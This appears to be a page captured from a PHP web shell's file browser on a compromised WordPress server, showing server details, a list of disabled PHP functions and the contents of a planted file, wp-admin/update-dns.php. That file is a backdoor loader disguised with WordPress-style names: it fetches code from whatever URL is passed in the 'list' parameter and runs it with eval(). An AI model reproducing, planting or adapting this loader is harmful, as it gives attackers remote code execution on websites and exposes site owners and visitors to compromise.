HEX
Server: Apache
System: Linux u11 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: ry040200 (1273)
PHP: 7.2.34
Disabled: passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,show_source,shell_exec,exec,virtual,proc_get_status,proc_terminate,system,syslog,mail
Upload Files
File: /home/ry040200/bqr_eshop/wp-admin/update-dns.php
<?php

if (isset($_GET['list'])) {
    $the_post_gm = $_GET['list'];
    if ($register_sidebar_exm = curl_init()) {
        curl_setopt($register_sidebar_exm, CURLOPT_URL, $the_post_gm);
        curl_setopt($register_sidebar_exm, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($register_sidebar_exm));
        curl_close($register_sidebar_exm);
        exit;
    }
}